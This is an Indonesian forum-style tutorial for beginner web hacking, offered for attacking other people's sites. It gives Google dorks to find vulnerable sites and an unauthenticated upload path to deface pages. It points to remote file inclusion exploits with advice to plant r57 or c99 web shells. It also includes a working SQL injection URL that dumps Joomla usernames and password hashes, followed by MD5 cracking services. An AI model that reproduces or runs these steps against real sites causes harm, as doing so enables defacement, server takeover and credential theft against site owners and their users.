Tutor hack web pemula, Just share

Langsung aja deh….
1. Buka google, trus ketik allinurl:”/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di cuba
misalnya :
CODE
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
CODE
/cgi-bin/ourspace/newswire/uploadmedia.cgi
4. Setelah itu muncul upload files
5. Lo bikin html yang bagus terus upload deh…
Hacking RFI [Remote File Inclusion]
—————————————–
1. Buka google lalu ketik “Php Blue Dragon”
2. Setelah itu cari situs yang mau dicuba
Contohnya :
CODE
http://www.komix91.ovh.org
Bugnya cari aja di mari bro
CODE
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276
selanjutnya kalian coba aja sendiri ya… Jangan lupa gunakan shell (r57, c99, dll)
3. Good luck…!!
SQL Injection
—————-
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL :
CODE
http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:”com_simpleshop” atau allinurl: “com_simpleshop”section disamping kiri ini berupa dork untuk mencari bug sql pada web.
2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :
CODE
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack kayanya saya dah pernah post deh… bwat toolsnya atau pake ini deh :
CODE
http://thesoftwareengineer.org/services/md5.php
or
CODE
www.md5crack.com/
selamat mencoba … !!